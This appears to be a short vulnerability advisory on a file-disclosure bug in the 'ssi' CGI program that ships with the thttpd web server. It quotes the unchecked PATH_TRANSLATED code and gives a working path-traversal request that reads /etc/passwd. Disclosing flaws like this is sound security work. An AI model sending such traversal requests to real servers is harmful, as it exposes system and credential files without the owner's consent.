The thttpd web server comes with a CGI script called /cgi-bin/ssi which allows any file on the system to be read. Exploit URL included.
25679f8183d70073b7bf52ab21666b2b31569ed14056ca67fae4e26e726dd272
ssi ( server sides include ) is a cgi proggie that comes by default
with thttpd web server, I am not sure about others.
ssi has a nasty bug with regards to the PATH_TRANSLATED env var.
As you can see the contents of PATH_TRANSLATED get copied into path_translated
which get's fopen()'ed later.
It does no checking on the path_translated string. After it opens the file
it runs the read_file() function which returns the contents of fp.
So as you can plainly see we can view any file on the system.
try
GET /cgi-bin/ssi//../../../../../../../../../etc/passwd
this would yield the passwd file.
path_translated = getenv( "PATH_TRANSLATED" );
if ( path_translated == (char*) 0 )
{
internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
exit( 1 );
}
/* Open it. */
fp = fopen( path_translated, "r" );
read_file( path_info, path_translated, fp );